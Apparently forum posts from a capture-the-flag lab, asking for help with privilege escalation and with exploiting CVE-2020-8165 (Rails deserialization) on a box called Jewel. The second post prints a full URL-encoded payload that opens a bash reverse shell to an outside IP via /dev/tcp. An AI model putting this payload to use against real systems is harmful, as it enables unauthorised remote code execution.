Hi Ecodb, quick question on the priv esc. I'm stuck at this error: Error "Operation not permitted" while writing config. Could you give me a hint what I could use to get in sync?
Hi, can you help me with Jewel? I'm trying to go through CVE-2020-8165. I was able to change the username to more than 25 characters (more than allowed), but I can't make it execute my payload...
I'm using a payload similar to this: https://github.com/masahiro331/CVE-2020-8165. I'm using Burp to intercept the request to update the username and replacing it with the URL-encoded payload: %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60%2Fbin%2Fbash+-c+%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.15.75%2F443+0%3E%261%22%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
I also tried many other payloads, to make it ping or curl me, but none of them worked.